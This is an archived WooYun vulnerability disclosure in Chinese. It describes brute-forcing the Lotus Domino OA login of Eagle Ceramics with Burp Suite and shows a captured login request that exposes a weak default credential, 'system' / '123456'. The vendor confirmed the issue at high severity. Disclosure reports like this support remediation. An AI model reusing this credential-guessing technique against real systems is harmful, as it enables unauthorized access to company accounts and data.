乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-21: 细节已通知厂商并且等待厂商处理中 2015-12-25: 厂商已经确认,细节仅向厂商公开 2016-01-04: 细节向核心白帽子及相关领域专家公开 2016-01-14: 细节向普通白帽子公开 2016-01-24: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
鹰牌陶瓷,创立于1974年,是广东鹰牌陶瓷集团有限公司旗下的旗舰品牌,被中国陶瓷卫浴品牌网评选为2013年中国陶瓷十大品牌。
当然是burpsuite爆破咯OA系统登录地址:
http://**.**.**.**/
抓包字典爆破
抓个包
POST /names.nsf?Login HTTP/1.1Host: **.**.**.**Content-Length: 323Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/names.nsf?LoginAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: LKS_UA_CurUserAD=CN=ÍõÁ¢/CN=Users/DC=eagleceramics/DC=com; LKS_UA_DepDisLevel=-1; LKS_UA_DepExpandLevel=1; LKS_UA_AllExpandLevel=2; LKS_UA_MyExpandLevel=1; LKS_UA_PostDisLevel=3; LKS_UA_CurUserFullDep=¹ã¶«Ó¥ÅÆÌմɼ¯ÍÅÓÐÏÞ¹«Ë¾/¹ú¼ÊÒµÎñ²¿/ÒµÎñ×é; LKS_UA_CurUserAllDep=¹ã¶«Ó¥ÅÆÌմɼ¯ÍÅÓÐÏÞ¹«Ë¾/¹ú¼ÊÒµÎñ²¿/¹ú¼ÊÒµÎñ²¿ÒµÎñ×é; LKS_UA_baseUnit=-1; LKS_UA_searchPost=true; LKS_UA_searchUnit=true; LKS_UA_searchPeople=true; LKS_UA_mailForbidUnit=; LKS_WP_MainPGID=lks/koa/lks_workplace.nsf|5C1E72D68A3175F0482574810031FC92; LKS_CurUser=CN=ÍõÁ¢/CN=Users/DC=eagleceramics/DC=com; LKS_WP_PageTitle=ÓªÏúϵͳÃÅ»§; LKS_WP_HeadHeight=90; LKS_WorkplaceStyle=workplace/apricot; LKS_WP_MyPageList=; LKS_WP_PageList=¹«Ë¾ÃÅ»§|E1E932128748FDE348257414001F4567|_top<br>Áìµ¼ÃÅ»§|63B0515B74E870594825744A001EC228|_top<br>µ³Î¯Ó빤»áÃÅ»§|D7C9AFA0644D533F48257801000F3FC3|_top<br>×ܲðìÃÅ»§|655739C28EEE1A23482574090024B2CC|_top<br>²ÆÎñ²¿ÃÅ»§|71E72D64737971EB482574090025035B|_top<br>ÈËÁ¦×ÊÔ´²¿ÃÅ»§|A41DD0676B50D2504825740900252EAA|_top<br>ÓªÏúϵͳÃÅ»§|5C1E72D68A3175F0482574810031FC92|_top<br>·þÎñÖÐÐÄÃÅ»§|F33D93D5E9AE368B48257871004DF411|_top<br>²úÑÐϵͳÃÅ»§|3DAD744EAFB5C7A9482574810031DE82|_top<br>¹©Ó¦Á´ÏµÍ³ÃÅ»§|6BEAA23EB784A0B2482574880008C8E4|_top<br>¶«Ô´Ó¥ÅÆ(¶þ³§)ÃÅ»§|90243F22ED720FB7482577C0002C060F|_top<br>ÆÕͨÃÅ»§|98BFD27DB706D395482574090021D0B2|_top<br>ϵͳÅäÖÿâ|4B968BC074B74C61482570A2000E9D01|_blank<br>²âÊÔÃÅ»§|7F85FFA49AB4FD5D48257B9B00315A53|_top; LKS_WorkplaceRoles=$$WebClient%25%25ModDate=0000000000000000&Keyword=201512202120428641&F_serverurl=**.**.**.**&Query_String=Login&F_appsetuppath=lks%2Fsys%2F&F_LogDb=lks%2Fsys%2Flks_loginlog.nsf&Username=system&Password=123456&submit.x=47&submit.y=6&submit=submit&RedirectTo=%2Flks%2Fsys%2Flks_loginlog.nsf%2Fag_loginlog%3Fopenagent%26%2F
爆个破
员工安全意识不足还有很多 就不一一列举了 赶紧通知修复漏洞吧 毕竟是中国的老品牌了
修复方案你们比我专业
危害等级:高
漏洞Rank:10
确认时间:2015-12-25 15:39
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无